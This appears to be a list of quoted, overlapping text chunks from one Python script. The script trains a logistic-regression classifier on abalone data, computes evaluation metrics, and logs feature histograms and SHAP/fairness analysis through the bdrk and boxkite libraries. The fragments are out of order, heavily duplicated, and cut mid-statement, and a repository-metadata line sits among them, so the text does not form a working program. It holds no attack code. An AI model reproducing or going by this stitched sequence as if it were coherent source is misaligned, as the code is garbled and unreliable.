"Train Shap model and calculate xafai metrics analyzer = ( ModelAnalyzer(pipe[1], model_name='logistic', model_type=ModelTypes.LINEAR)",
"\"\"\" test_prob = pipe.predict_proba(x_test) test_pred = pipe.predict(x_test) acc = metrics.accuracy_score(y_test, test_pred) precision =",
"y_train_onehot = enc.fit_transform(y_train.reshape(-1, 1)) y_test_onehot = enc.fit_transform(y_test.reshape(-1, 1)) print('\\nCATEGORIES') for value, category in",
".test_features(x_test) .fairness_config(CONFIG_FAI) .test_labels(y_test) .test_inference(test_pred) ) analyzer.analyze() print('Saved Shap model and fairness results.') if",
"OneHotEncoder(handle_unknown='ignore', sparse=False) y_train_onehot = enc.fit_transform(y_train.reshape(-1, 1)) y_test_onehot = enc.fit_transform(y_test.reshape(-1, 1)) print('\\nCATEGORIES') for value,",
"# and inference to be numeric values y_train = np.argmax(y_train_onehot, axis=1) y_test =",
"numpy.ndarray] \"\"\" df = pd.read_csv(filepath) df['large_rings'] = (df['Rings'] > 10).astype(int) # Ensure nothing",
"\"Accuracy\": acc, \"Precision (macro)\": precision, \"Recall (macro)\": recall, \"F1 Score (macro)\": f1_score, \"ROC",
"Whether to print additional info :type verbose: bool :return: Pipeline of transforms with",
"pandas dataframe and the target variable as a numpy array. :param filepath: Path",
".test_labels(y_test) .test_inference(test_pred) ) analyzer.analyze() print('Saved Shap model and fairness results.') if __name__ ==",
"# Specify inference as discrete ] encoder = MetricEncoder(collectors=collectors) with open(BaselineMetricCollector.DEFAULT_HISTOGRAM_PATH, \"wb\") as",
"(n_samples, n_classes) enc = OneHotEncoder(handle_unknown='ignore', sparse=False) y_train_onehot = enc.fit_transform(y_train.reshape(-1, 1)) y_test_onehot = enc.fit_transform(y_test.reshape(-1,",
"X: pandas.core.frame.DataFrame :param y: Target variable :type y: numpy.ndarray :param seed: `random_state` for",
"num_rows_dropped = original_len - len(df) if num_rows_dropped > 0: print(f\"Warning - dropped {num_rows_dropped}",
"data=x_train.iteritems(), discrete={7, 8}, # Specify which column indices are discrete ), InferenceHistogramCollector(data=train_predicted, is_discrete=True)",
"enc = OneHotEncoder(handle_unknown='ignore', sparse=False) y_train_onehot = enc.fit_transform(y_train.reshape(-1, 1)) y_test_onehot = enc.fit_transform(y_test.reshape(-1, 1)) print('\\nCATEGORIES')",
"verbose and print('Fitting...') verbose and print('C:', C) model = LogisticRegression(random_state=seed, C=C, max_iter=4000) model.fit(X,",
"corresponding to values=[0] \"unprivileged_group_name\": \"Small\", } } def load_dataset(filepath: str, target: str) ->",
"print('\\nSaved trained one hot encoder and logistic regression model.') test_prob, test_pred = compute_log_metrics(pipe,",
"{ \"privileged_attribute_values\": [1], # privileged group name corresponding to values=[1] \"privileged_group_name\": \"Large\", \"unprivileged_attribute_values\":",
"verbose: bool = False) -> Pipeline: \"\"\" Scales the features and trains a",
"data for testing :type y_test: numpy.ndarray :param y_test_onehot: One hot encoded target variable",
"pipe def compute_log_metrics(pipe: Pipeline, x_test: pd.core.frame.DataFrame, y_test: np.ndarray, y_test_onehot: np.ndarray): \"\"\" Computes, prints",
"= OneHotEncoder(handle_unknown='ignore', sparse=False) y_train_onehot = enc.fit_transform(y_train.reshape(-1, 1)) y_test_onehot = enc.fit_transform(y_test.reshape(-1, 1)) print('\\nCATEGORIES') for",
"False) -> Pipeline: \"\"\" Scales the features and trains a logistic regression model.",
"pipe.predict_proba(x_test) test_pred = pipe.predict(x_test) acc = metrics.accuracy_score(y_test, test_pred) precision = metrics.precision_score(y_test, test_pred, average='macro')",
"and the target numpy array :rtype: tuple[pandas.core.frame.DataFrame, numpy.ndarray] \"\"\" df = pd.read_csv(filepath) df['large_rings']",
"test_prob = pipe.predict_proba(x_test) test_pred = pipe.predict(x_test) acc = metrics.accuracy_score(y_test, test_pred) precision = metrics.precision_score(y_test,",
"] encoder = MetricEncoder(collectors=collectors) with open(BaselineMetricCollector.DEFAULT_HISTOGRAM_PATH, \"wb\") as f: f.write(encoder.as_text()) print('Saved feature and",
"tuple[pandas.core.frame.DataFrame, numpy.ndarray] \"\"\" df = pd.read_csv(filepath) df['large_rings'] = (df['Rings'] > 10).astype(int) # Ensure",
"original_len - len(df) if num_rows_dropped > 0: print(f\"Warning - dropped {num_rows_dropped} rows with",
"print('Done training.') return pipe def compute_log_metrics(pipe: Pipeline, x_test: pd.core.frame.DataFrame, y_test: np.ndarray, y_test_onehot: np.ndarray):",
"seed: float = 0, C: float = 1, verbose: bool = False) ->",
"seed=0, C=C, verbose=True) # Save trained model feature_names = x_train.columns.tolist() print(\"\\nSAMPLE FEATURES\") print({",
"model metrics bdrk.log_metrics( { \"Accuracy\": acc, \"Precision (macro)\": precision, \"Recall (macro)\": recall, \"F1",
"= env(\"TRAIN_DATA_PATH\") TEST_DATA_PATH = env(\"TEST_DATA_PATH\") C = env.float(\"C\") CONFIG_FAI = { \"large_rings\": {",
"env(\"OUTPUT_MODEL_PATH\") TRAIN_DATA_PATH = env(\"TRAIN_DATA_PATH\") TEST_DATA_PATH = env(\"TEST_DATA_PATH\") C = env.float(\"C\") CONFIG_FAI = {",
"verbose and print('Done training.') return pipe def compute_log_metrics(pipe: Pipeline, x_test: pd.core.frame.DataFrame, y_test: np.ndarray,",
"filepath: Path to load the data :type filepath: str :param target: Target variable",
"transforms with a trained final estimator :rtype: sklearn.pipeline.Pipeline \"\"\" verbose and print('\\nTRAIN\\nScaling...') scaling",
"and inferance distribution train_predicted = pipe.predict(x_train).flatten().tolist() collectors = [ FeatureHistogramCollector( data=x_train.iteritems(), discrete={7, 8},",
"y_train = load_dataset( filepath=TRAIN_DATA_PATH, target='Type' ) x_test, y_test = load_dataset( filepath=TEST_DATA_PATH, target='Type' )",
"y_train, seed=0, C=C, verbose=True) # Save trained model feature_names = x_train.columns.tolist() print(\"\\nSAMPLE FEATURES\")",
"transforms with a trained final estimator :type pipe: sklearn.pipeline.Pipeline :param x_test: Features for",
"a trained final estimator :rtype: sklearn.pipeline.Pipeline \"\"\" verbose and print('\\nTRAIN\\nScaling...') scaling = StandardScaler()",
"rows with NA data.\") y = df[target].values df.drop(target, axis=1, inplace=True) return df, y",
"from environs import Env from sklearn import metrics from sklearn.linear_model import LogisticRegression from",
"expects # binary label indicators with shape (n_samples, n_classes) enc = OneHotEncoder(handle_unknown='ignore', sparse=False)",
"str(x_train[feature_name][0]) for feature_name in feature_names }) joblib.dump([feature_names, enc, pipe], OUTPUT_MODEL_PATH) print('\\nSaved trained one",
"1)) y_test_onehot = enc.fit_transform(y_test.reshape(-1, 1)) print('\\nCATEGORIES') for value, category in enumerate(enc.categories_[0]): print(f'{category} :",
"LogisticRegression from sklearn.pipeline import Pipeline from sklearn.preprocessing import OneHotEncoder, StandardScaler env = Env()",
"both features # and inference to be numeric values y_train = np.argmax(y_train_onehot, axis=1)",
"a \"micro-average\" by # quantifying score on all classes jointly # See https://scikit-learn.org/stable/auto_examples/model_selection/plot_precision_recall.html",
"print additional info :type verbose: bool :return: Pipeline of transforms with a trained",
"tuple[numpy.ndarray, numpy.ndarray] \"\"\" test_prob = pipe.predict_proba(x_test) test_pred = pipe.predict(x_test) acc = metrics.accuracy_score(y_test, test_pred)",
"us to use the same `log_chart_data` method bdrk.log_binary_classifier_metrics( y_test_onehot.ravel().astype(int).tolist(), # list of int",
"test_pred = compute_log_metrics(pipe, x_test, y_test, y_test_onehot) # Save feature and inferance distribution train_predicted",
"f\"\\tAccuracy = {acc:.4f}\\n\" f\"\\tPrecision (macro) = {precision:.4f}\\n\" f\"\\tRecall (macro) = {recall:.4f}\\n\" f\"\\tF1 score",
"# Save feature and inferance distribution train_predicted = pipe.predict(x_train).flatten().tolist() collectors = [ FeatureHistogramCollector(",
"}) joblib.dump([feature_names, enc, pipe], OUTPUT_MODEL_PATH) print('\\nSaved trained one hot encoder and logistic regression",
"import MetricEncoder from environs import Env from sklearn import metrics from sklearn.linear_model import",
"# list of int test_prob.ravel().astype(float).tolist() # list of float ) return test_prob, test_pred",
"print('Saved feature and inference distribution.') # Train Shap model and calculate xafai metrics",
"values=[1] \"privileged_group_name\": \"Large\", \"unprivileged_attribute_values\": [0], # unprivileged group name corresponding to values=[0] \"unprivileged_group_name\":",
"target: str) -> Tuple[pd.core.frame.DataFrame, np.ndarray]: \"\"\" Loads the dataset and returns the features",
"print('C:', C) model = LogisticRegression(random_state=seed, C=C, max_iter=4000) model.fit(X, y) verbose and print('Chaining pipeline...')",
"average='macro') f1_score = metrics.f1_score(y_test, test_pred, average='macro') roc_auc = metrics.roc_auc_score(y_test_onehot, test_prob, average='macro', multi_class='ovr') avg_prc",
"Score (macro)\": f1_score, \"ROC AUC (macro)\": roc_auc, \"Avg precision (macro)\": avg_prc, } )",
"np.ndarray, y_test_onehot: np.ndarray): \"\"\" Computes, prints and log metrics. :param pipe: Pipeline of",
"y_test_onehot: numpy.ndarray :return: Test predicted probability and predictions :rtype: tuple[numpy.ndarray, numpy.ndarray] \"\"\" test_prob",
"enc, pipe], OUTPUT_MODEL_PATH) print('\\nSaved trained one hot encoder and logistic regression model.') test_prob,",
"-> Tuple[pd.core.frame.DataFrame, np.ndarray]: \"\"\" Loads the dataset and returns the features as a",
"The features pandas dataframe and the target numpy array :rtype: tuple[pandas.core.frame.DataFrame, numpy.ndarray] \"\"\"",
"indices are discrete ), InferenceHistogramCollector(data=train_predicted, is_discrete=True) # Specify inference as discrete ] encoder",
"train_log_reg_model(X: pd.core.frame.DataFrame, y: np.ndarray, seed: float = 0, C: float = 1, verbose:",
"bool = False) -> Pipeline: \"\"\" Scales the features and trains a logistic",
":param X: Features for training :type X: pandas.core.frame.DataFrame :param y: Target variable :type",
"scaling = StandardScaler() X = scaling.fit_transform(X) verbose and print('Fitting...') verbose and print('C:', C)",
":param target: Target variable :type target: str :return: The features pandas dataframe and",
"compute_log_metrics(pipe, x_test, y_test, y_test_onehot) # Save feature and inferance distribution train_predicted = pipe.predict(x_train).flatten().tolist()",
"f\"\\tF1 score (macro) = {f1_score:.4f}\\n\" f\"\\tROC AUC (macro) = {roc_auc:.4f}\\n\" f\"\\tAverage precision (macro)",
"CONFIG_FAI = { \"large_rings\": { \"privileged_attribute_values\": [1], # privileged group name corresponding to",
"of int test_prob.ravel().astype(float).tolist() # list of float ) return test_prob, test_pred def main():",
"> 0: print(f\"Warning - dropped {num_rows_dropped} rows with NA data.\") y = df[target].values",
"variable to numeric values # ModelMonitoringService.export_text expect both features # and inference to",
"variable data for testing :type y_test: numpy.ndarray :param y_test_onehot: One hot encoded target",
"probability and predictions :rtype: tuple[numpy.ndarray, numpy.ndarray] \"\"\" test_prob = pipe.predict_proba(x_test) test_pred = pipe.predict(x_test)",
"numeric values # ModelMonitoringService.export_text expect both features # and inference to be numeric",
"str :param target: Target variable :type target: str :return: The features pandas dataframe",
"# This will allow us to use the same `log_chart_data` method bdrk.log_binary_classifier_metrics( y_test_onehot.ravel().astype(int).tolist(),",
"values # ModelMonitoringService.export_text expect both features # and inference to be numeric values",
"quantifying score on all classes jointly # See https://scikit-learn.org/stable/auto_examples/model_selection/plot_precision_recall.html # noqa: E501 #",
"binary classification # For multiclass labels, we can use a \"micro-average\" by #",
"of regularization strength :type C: float :param verbose: Whether to print additional info",
"metrics from sklearn.linear_model import LogisticRegression from sklearn.pipeline import Pipeline from sklearn.preprocessing import OneHotEncoder,",
"with open(BaselineMetricCollector.DEFAULT_HISTOGRAM_PATH, \"wb\") as f: f.write(encoder.as_text()) print('Saved feature and inference distribution.') # Train",
"OneHotEncoder, StandardScaler env = Env() OUTPUT_MODEL_PATH = env(\"OUTPUT_MODEL_PATH\") TRAIN_DATA_PATH = env(\"TRAIN_DATA_PATH\") TEST_DATA_PATH =",
"additional info :type verbose: bool :return: Pipeline of transforms with a trained final",
":param y: Target variable :type y: numpy.ndarray :param seed: `random_state` for logistic regression",
"regression model :type seed: float :param C: Inverse of regularization strength :type C:",
"`log_chart_data` method bdrk.log_binary_classifier_metrics( y_test_onehot.ravel().astype(int).tolist(), # list of int test_prob.ravel().astype(float).tolist() # list of float",
"import numpy as np import pandas as pd from bdrk.model_analyzer import ModelAnalyzer, ModelTypes",
"final estimator :type pipe: sklearn.pipeline.Pipeline :param x_test: Features for testing :type x_test: pandas.core.frame.DataFrame",
"hot encoded target variable data :type y_test_onehot: numpy.ndarray :return: Test predicted probability and",
"classes jointly # See https://scikit-learn.org/stable/auto_examples/model_selection/plot_precision_recall.html # noqa: E501 # This will allow us",
"method bdrk.log_binary_classifier_metrics( y_test_onehot.ravel().astype(int).tolist(), # list of int test_prob.ravel().astype(float).tolist() # list of float )",
":param y_test_onehot: One hot encoded target variable data :type y_test_onehot: numpy.ndarray :return: Test",
"print(x_train) # sklearn `roc_auc_score` and `average_precision_score` expects # binary label indicators with shape",
"regularization strength :type C: float :param verbose: Whether to print additional info :type",
"1, verbose: bool = False) -> Pipeline: \"\"\" Scales the features and trains",
"to use the same `log_chart_data` method bdrk.log_binary_classifier_metrics( y_test_onehot.ravel().astype(int).tolist(), # list of int test_prob.ravel().astype(float).tolist()",
"Shap model and fairness results.') if __name__ == '__main__': bdrk.init() with bdrk.start_run(): main()",
"metrics bdrk.log_metrics( { \"Accuracy\": acc, \"Precision (macro)\": precision, \"Recall (macro)\": recall, \"F1 Score",
"to be numeric values y_train = np.argmax(y_train_onehot, axis=1) y_test = np.argmax(y_test_onehot, axis=1) pipe",
"FeatureHistogramCollector, InferenceHistogramCollector ) from boxkite.monitoring.encoder import MetricEncoder from environs import Env from sklearn",
"corresponding to values=[1] \"privileged_group_name\": \"Large\", \"unprivileged_attribute_values\": [0], # unprivileged group name corresponding to",
"E501 # This will allow us to use the same `log_chart_data` method bdrk.log_binary_classifier_metrics(",
"axis=0, inplace=True) num_rows_dropped = original_len - len(df) if num_rows_dropped > 0: print(f\"Warning -",
"target: Target variable :type target: str :return: The features pandas dataframe and the",
"= np.argmax(y_test_onehot, axis=1) pipe = train_log_reg_model(x_train, y_train, seed=0, C=C, verbose=True) # Save trained",
"for feature_name in feature_names }) joblib.dump([feature_names, enc, pipe], OUTPUT_MODEL_PATH) print('\\nSaved trained one hot",
"as a pandas dataframe and the target variable as a numpy array. :param",
"float :param C: Inverse of regularization strength :type C: float :param verbose: Whether",
"y_test = load_dataset( filepath=TEST_DATA_PATH, target='Type' ) print('X (train)') print(x_train) # sklearn `roc_auc_score` and",
"returns the features as a pandas dataframe and the target variable as a",
"X: Features for training :type X: pandas.core.frame.DataFrame :param y: Target variable :type y:",
"bdrk.model_analyzer import ModelAnalyzer, ModelTypes from boxkite.monitoring.collector import ( BaselineMetricCollector, FeatureHistogramCollector, InferenceHistogramCollector ) from",
"print(\"\\nEVALUATION\\n\" f\"\\tAccuracy = {acc:.4f}\\n\" f\"\\tPrecision (macro) = {precision:.4f}\\n\" f\"\\tRecall (macro) = {recall:.4f}\\n\" f\"\\tF1",
"# binary label indicators with shape (n_samples, n_classes) enc = OneHotEncoder(handle_unknown='ignore', sparse=False) y_train_onehot",
"acc = metrics.accuracy_score(y_test, test_pred) precision = metrics.precision_score(y_test, test_pred, average='macro') recall = metrics.recall_score(y_test, test_pred,",
"print('\\nTRAIN\\nScaling...') scaling = StandardScaler() X = scaling.fit_transform(X) verbose and print('Fitting...') verbose and print('C:',",
"- dropped {num_rows_dropped} rows with NA data.\") y = df[target].values df.drop(target, axis=1, inplace=True)",
"values=[0] \"unprivileged_group_name\": \"Small\", } } def load_dataset(filepath: str, target: str) -> Tuple[pd.core.frame.DataFrame, np.ndarray]:",
"Convert target variable to numeric values # ModelMonitoringService.export_text expect both features # and",
"collectors = [ FeatureHistogramCollector( data=x_train.iteritems(), discrete={7, 8}, # Specify which column indices are",
"and log metrics. :param pipe: Pipeline of transforms with a trained final estimator",
"use a \"micro-average\" by # quantifying score on all classes jointly # See",
"len(df) df.dropna(how=\"any\", axis=0, inplace=True) num_rows_dropped = original_len - len(df) if num_rows_dropped > 0:",
"Computes, prints and log metrics. :param pipe: Pipeline of transforms with a trained",
"\"Precision (macro)\": precision, \"Recall (macro)\": recall, \"F1 Score (macro)\": f1_score, \"ROC AUC (macro)\":",
"metrics. :param pipe: Pipeline of transforms with a trained final estimator :type pipe:",
"<reponame>kesamet/examples<gh_stars>1-10 import joblib from typing import Tuple import bdrk import numpy as np",
"boxkite.monitoring.collector import ( BaselineMetricCollector, FeatureHistogramCollector, InferenceHistogramCollector ) from boxkite.monitoring.encoder import MetricEncoder from environs",
"Inverse of regularization strength :type C: float :param verbose: Whether to print additional",
"data :type y_test_onehot: numpy.ndarray :return: Test predicted probability and predictions :rtype: tuple[numpy.ndarray, numpy.ndarray]",
") from boxkite.monitoring.encoder import MetricEncoder from environs import Env from sklearn import metrics",
"inference as discrete ] encoder = MetricEncoder(collectors=collectors) with open(BaselineMetricCollector.DEFAULT_HISTOGRAM_PATH, \"wb\") as f: f.write(encoder.as_text())",
"= Pipeline([('scaling', scaling), ('model', model)]) verbose and print('Done training.') return pipe def compute_log_metrics(pipe:",
"typing import Tuple import bdrk import numpy as np import pandas as pd",
"> 10).astype(int) # Ensure nothing missing original_len = len(df) df.dropna(how=\"any\", axis=0, inplace=True) num_rows_dropped",
"C) model = LogisticRegression(random_state=seed, C=C, max_iter=4000) model.fit(X, y) verbose and print('Chaining pipeline...') pipe",
"y_test = np.argmax(y_test_onehot, axis=1) pipe = train_log_reg_model(x_train, y_train, seed=0, C=C, verbose=True) # Save",
"Pipeline: \"\"\" Scales the features and trains a logistic regression model. :param X:",
"print(f\"Warning - dropped {num_rows_dropped} rows with NA data.\") y = df[target].values df.drop(target, axis=1,",
"all classes jointly # See https://scikit-learn.org/stable/auto_examples/model_selection/plot_precision_recall.html # noqa: E501 # This will allow",
"= { \"large_rings\": { \"privileged_attribute_values\": [1], # privileged group name corresponding to values=[1]",
"from sklearn.pipeline import Pipeline from sklearn.preprocessing import OneHotEncoder, StandardScaler env = Env() OUTPUT_MODEL_PATH",
"for value, category in enumerate(enc.categories_[0]): print(f'{category} : {value}') # Convert target variable to",
"Pipeline([('scaling', scaling), ('model', model)]) verbose and print('Done training.') return pipe def compute_log_metrics(pipe: Pipeline,",
") x_test, y_test = load_dataset( filepath=TEST_DATA_PATH, target='Type' ) print('X (train)') print(x_train) # sklearn",
"{f1_score:.4f}\\n\" f\"\\tROC AUC (macro) = {roc_auc:.4f}\\n\" f\"\\tAverage precision (macro) = {avg_prc:.4f}\") # Bedrock",
"# privileged group name corresponding to values=[1] \"privileged_group_name\": \"Large\", \"unprivileged_attribute_values\": [0], # unprivileged",
"array. :param filepath: Path to load the data :type filepath: str :param target:",
"avg_prc, } ) # `log_chart_data` assumes binary classification # For multiclass labels, we",
"model.fit(X, y) verbose and print('Chaining pipeline...') pipe = Pipeline([('scaling', scaling), ('model', model)]) verbose",
"load the data :type filepath: str :param target: Target variable :type target: str",
"= metrics.precision_score(y_test, test_pred, average='macro') recall = metrics.recall_score(y_test, test_pred, average='macro') f1_score = metrics.f1_score(y_test, test_pred,",
"\"unprivileged_group_name\": \"Small\", } } def load_dataset(filepath: str, target: str) -> Tuple[pd.core.frame.DataFrame, np.ndarray]: \"\"\"",
"y_test: numpy.ndarray :param y_test_onehot: One hot encoded target variable data :type y_test_onehot: numpy.ndarray",
"( BaselineMetricCollector, FeatureHistogramCollector, InferenceHistogramCollector ) from boxkite.monitoring.encoder import MetricEncoder from environs import Env",
"\"F1 Score (macro)\": f1_score, \"ROC AUC (macro)\": roc_auc, \"Avg precision (macro)\": avg_prc, }",
"score (macro) = {f1_score:.4f}\\n\" f\"\\tROC AUC (macro) = {roc_auc:.4f}\\n\" f\"\\tAverage precision (macro) =",
"a trained final estimator :type pipe: sklearn.pipeline.Pipeline :param x_test: Features for testing :type",
"the features as a pandas dataframe and the target variable as a numpy",
"dropped {num_rows_dropped} rows with NA data.\") y = df[target].values df.drop(target, axis=1, inplace=True) return",
"bool :return: Pipeline of transforms with a trained final estimator :rtype: sklearn.pipeline.Pipeline \"\"\"",
"logistic regression model.') test_prob, test_pred = compute_log_metrics(pipe, x_test, y_test, y_test_onehot) # Save feature",
"MetricEncoder(collectors=collectors) with open(BaselineMetricCollector.DEFAULT_HISTOGRAM_PATH, \"wb\") as f: f.write(encoder.as_text()) print('Saved feature and inference distribution.') #",
") analyzer.analyze() print('Saved Shap model and fairness results.') if __name__ == '__main__': bdrk.init()",
"sklearn `roc_auc_score` and `average_precision_score` expects # binary label indicators with shape (n_samples, n_classes)",
"recall, \"F1 Score (macro)\": f1_score, \"ROC AUC (macro)\": roc_auc, \"Avg precision (macro)\": avg_prc,",
"category in enumerate(enc.categories_[0]): print(f'{category} : {value}') # Convert target variable to numeric values",
"recall = metrics.recall_score(y_test, test_pred, average='macro') f1_score = metrics.f1_score(y_test, test_pred, average='macro') roc_auc = metrics.roc_auc_score(y_test_onehot,",
"dataset and returns the features as a pandas dataframe and the target variable",
"y) verbose and print('Chaining pipeline...') pipe = Pipeline([('scaling', scaling), ('model', model)]) verbose and",
"score on all classes jointly # See https://scikit-learn.org/stable/auto_examples/model_selection/plot_precision_recall.html # noqa: E501 # This",
"inference distribution.') # Train Shap model and calculate xafai metrics analyzer = (",
"verbose and print('\\nTRAIN\\nScaling...') scaling = StandardScaler() X = scaling.fit_transform(X) verbose and print('Fitting...') verbose",
"ModelAnalyzer(pipe[1], model_name='logistic', model_type=ModelTypes.LINEAR) .train_features(x_train) .test_features(x_test) .fairness_config(CONFIG_FAI) .test_labels(y_test) .test_inference(test_pred) ) analyzer.analyze() print('Saved Shap model",
"= 1, verbose: bool = False) -> Pipeline: \"\"\" Scales the features and",
"inplace=True) num_rows_dropped = original_len - len(df) if num_rows_dropped > 0: print(f\"Warning - dropped",
"compute_log_metrics(pipe: Pipeline, x_test: pd.core.frame.DataFrame, y_test: np.ndarray, y_test_onehot: np.ndarray): \"\"\" Computes, prints and log",
"StandardScaler env = Env() OUTPUT_MODEL_PATH = env(\"OUTPUT_MODEL_PATH\") TRAIN_DATA_PATH = env(\"TRAIN_DATA_PATH\") TEST_DATA_PATH = env(\"TEST_DATA_PATH\")",
"= {roc_auc:.4f}\\n\" f\"\\tAverage precision (macro) = {avg_prc:.4f}\") # Bedrock Logger: captures model metrics",
"from bdrk.model_analyzer import ModelAnalyzer, ModelTypes from boxkite.monitoring.collector import ( BaselineMetricCollector, FeatureHistogramCollector, InferenceHistogramCollector )",
"('model', model)]) verbose and print('Done training.') return pipe def compute_log_metrics(pipe: Pipeline, x_test: pd.core.frame.DataFrame,",
"= StandardScaler() X = scaling.fit_transform(X) verbose and print('Fitting...') verbose and print('C:', C) model",
"test_prob.ravel().astype(float).tolist() # list of float ) return test_prob, test_pred def main(): x_train, y_train",
"in enumerate(enc.categories_[0]): print(f'{category} : {value}') # Convert target variable to numeric values #",
"boxkite.monitoring.encoder import MetricEncoder from environs import Env from sklearn import metrics from sklearn.linear_model",
"pipe: sklearn.pipeline.Pipeline :param x_test: Features for testing :type x_test: pandas.core.frame.DataFrame :param y_test: Target",
"indicators with shape (n_samples, n_classes) enc = OneHotEncoder(handle_unknown='ignore', sparse=False) y_train_onehot = enc.fit_transform(y_train.reshape(-1, 1))",
"# Bedrock Logger: captures model metrics bdrk.log_metrics( { \"Accuracy\": acc, \"Precision (macro)\": precision,",
"features and trains a logistic regression model. :param X: Features for training :type",
"and print('Fitting...') verbose and print('C:', C) model = LogisticRegression(random_state=seed, C=C, max_iter=4000) model.fit(X, y)",
"test_pred, average='macro') recall = metrics.recall_score(y_test, test_pred, average='macro') f1_score = metrics.f1_score(y_test, test_pred, average='macro') roc_auc",
"to print additional info :type verbose: bool :return: Pipeline of transforms with a",
".test_inference(test_pred) ) analyzer.analyze() print('Saved Shap model and fairness results.') if __name__ == '__main__':",
"from boxkite.monitoring.collector import ( BaselineMetricCollector, FeatureHistogramCollector, InferenceHistogramCollector ) from boxkite.monitoring.encoder import MetricEncoder from",
"privileged group name corresponding to values=[1] \"privileged_group_name\": \"Large\", \"unprivileged_attribute_values\": [0], # unprivileged group",
"{num_rows_dropped} rows with NA data.\") y = df[target].values df.drop(target, axis=1, inplace=True) return df,",
"discrete ] encoder = MetricEncoder(collectors=collectors) with open(BaselineMetricCollector.DEFAULT_HISTOGRAM_PATH, \"wb\") as f: f.write(encoder.as_text()) print('Saved feature",
"environs import Env from sklearn import metrics from sklearn.linear_model import LogisticRegression from sklearn.pipeline",
"FEATURES\") print({ feature_name: str(x_train[feature_name][0]) for feature_name in feature_names }) joblib.dump([feature_names, enc, pipe], OUTPUT_MODEL_PATH)",
"Logger: captures model metrics bdrk.log_metrics( { \"Accuracy\": acc, \"Precision (macro)\": precision, \"Recall (macro)\":",
"x_test, y_test, y_test_onehot) # Save feature and inferance distribution train_predicted = pipe.predict(x_train).flatten().tolist() collectors",
"n_classes) enc = OneHotEncoder(handle_unknown='ignore', sparse=False) y_train_onehot = enc.fit_transform(y_train.reshape(-1, 1)) y_test_onehot = enc.fit_transform(y_test.reshape(-1, 1))",
"{value}') # Convert target variable to numeric values # ModelMonitoringService.export_text expect both features",
"Ensure nothing missing original_len = len(df) df.dropna(how=\"any\", axis=0, inplace=True) num_rows_dropped = original_len -",
"Target variable data for testing :type y_test: numpy.ndarray :param y_test_onehot: One hot encoded",
"value, category in enumerate(enc.categories_[0]): print(f'{category} : {value}') # Convert target variable to numeric",
"inference to be numeric values y_train = np.argmax(y_train_onehot, axis=1) y_test = np.argmax(y_test_onehot, axis=1)",
"inferance distribution train_predicted = pipe.predict(x_train).flatten().tolist() collectors = [ FeatureHistogramCollector( data=x_train.iteritems(), discrete={7, 8}, #",
"\"unprivileged_attribute_values\": [0], # unprivileged group name corresponding to values=[0] \"unprivileged_group_name\": \"Small\", } }",
":rtype: sklearn.pipeline.Pipeline \"\"\" verbose and print('\\nTRAIN\\nScaling...') scaling = StandardScaler() X = scaling.fit_transform(X) verbose",
"= ( ModelAnalyzer(pipe[1], model_name='logistic', model_type=ModelTypes.LINEAR) .train_features(x_train) .test_features(x_test) .fairness_config(CONFIG_FAI) .test_labels(y_test) .test_inference(test_pred) ) analyzer.analyze() print('Saved",
"group name corresponding to values=[0] \"unprivileged_group_name\": \"Small\", } } def load_dataset(filepath: str, target:",
"import metrics from sklearn.linear_model import LogisticRegression from sklearn.pipeline import Pipeline from sklearn.preprocessing import",
":param seed: `random_state` for logistic regression model :type seed: float :param C: Inverse",
"f\"\\tRecall (macro) = {recall:.4f}\\n\" f\"\\tF1 score (macro) = {f1_score:.4f}\\n\" f\"\\tROC AUC (macro) =",
"discrete ), InferenceHistogramCollector(data=train_predicted, is_discrete=True) # Specify inference as discrete ] encoder = MetricEncoder(collectors=collectors)",
"# Ensure nothing missing original_len = len(df) df.dropna(how=\"any\", axis=0, inplace=True) num_rows_dropped = original_len",
"https://scikit-learn.org/stable/auto_examples/model_selection/plot_precision_recall.html # noqa: E501 # This will allow us to use the same",
"= pipe.predict(x_test) acc = metrics.accuracy_score(y_test, test_pred) precision = metrics.precision_score(y_test, test_pred, average='macro') recall =",
"dataframe and the target variable as a numpy array. :param filepath: Path to",
"to numeric values # ModelMonitoringService.export_text expect both features # and inference to be",
"seed: float :param C: Inverse of regularization strength :type C: float :param verbose:",
"print(\"\\nSAMPLE FEATURES\") print({ feature_name: str(x_train[feature_name][0]) for feature_name in feature_names }) joblib.dump([feature_names, enc, pipe],",
"axis=1, inplace=True) return df, y def train_log_reg_model(X: pd.core.frame.DataFrame, y: np.ndarray, seed: float =",
"def main(): x_train, y_train = load_dataset( filepath=TRAIN_DATA_PATH, target='Type' ) x_test, y_test = load_dataset(",
"= metrics.roc_auc_score(y_test_onehot, test_prob, average='macro', multi_class='ovr') avg_prc = metrics.average_precision_score(y_test_onehot, test_prob, average='macro') print(\"\\nEVALUATION\\n\" f\"\\tAccuracy =",
"= (df['Rings'] > 10).astype(int) # Ensure nothing missing original_len = len(df) df.dropna(how=\"any\", axis=0,",
"1)) print('\\nCATEGORIES') for value, category in enumerate(enc.categories_[0]): print(f'{category} : {value}') # Convert target",
"precision = metrics.precision_score(y_test, test_pred, average='macro') recall = metrics.recall_score(y_test, test_pred, average='macro') f1_score = metrics.f1_score(y_test,",
"enc.fit_transform(y_test.reshape(-1, 1)) print('\\nCATEGORIES') for value, category in enumerate(enc.categories_[0]): print(f'{category} : {value}') # Convert",
"print(f'{category} : {value}') # Convert target variable to numeric values # ModelMonitoringService.export_text expect",
"y = df[target].values df.drop(target, axis=1, inplace=True) return df, y def train_log_reg_model(X: pd.core.frame.DataFrame, y:",
"(macro)\": precision, \"Recall (macro)\": recall, \"F1 Score (macro)\": f1_score, \"ROC AUC (macro)\": roc_auc,",
"encoder and logistic regression model.') test_prob, test_pred = compute_log_metrics(pipe, x_test, y_test, y_test_onehot) #",
"f\"\\tPrecision (macro) = {precision:.4f}\\n\" f\"\\tRecall (macro) = {recall:.4f}\\n\" f\"\\tF1 score (macro) = {f1_score:.4f}\\n\"",
"# list of float ) return test_prob, test_pred def main(): x_train, y_train =",
"env = Env() OUTPUT_MODEL_PATH = env(\"OUTPUT_MODEL_PATH\") TRAIN_DATA_PATH = env(\"TRAIN_DATA_PATH\") TEST_DATA_PATH = env(\"TEST_DATA_PATH\") C",
"= np.argmax(y_train_onehot, axis=1) y_test = np.argmax(y_test_onehot, axis=1) pipe = train_log_reg_model(x_train, y_train, seed=0, C=C,",
"= MetricEncoder(collectors=collectors) with open(BaselineMetricCollector.DEFAULT_HISTOGRAM_PATH, \"wb\") as f: f.write(encoder.as_text()) print('Saved feature and inference distribution.')",
"training.') return pipe def compute_log_metrics(pipe: Pipeline, x_test: pd.core.frame.DataFrame, y_test: np.ndarray, y_test_onehot: np.ndarray): \"\"\"",
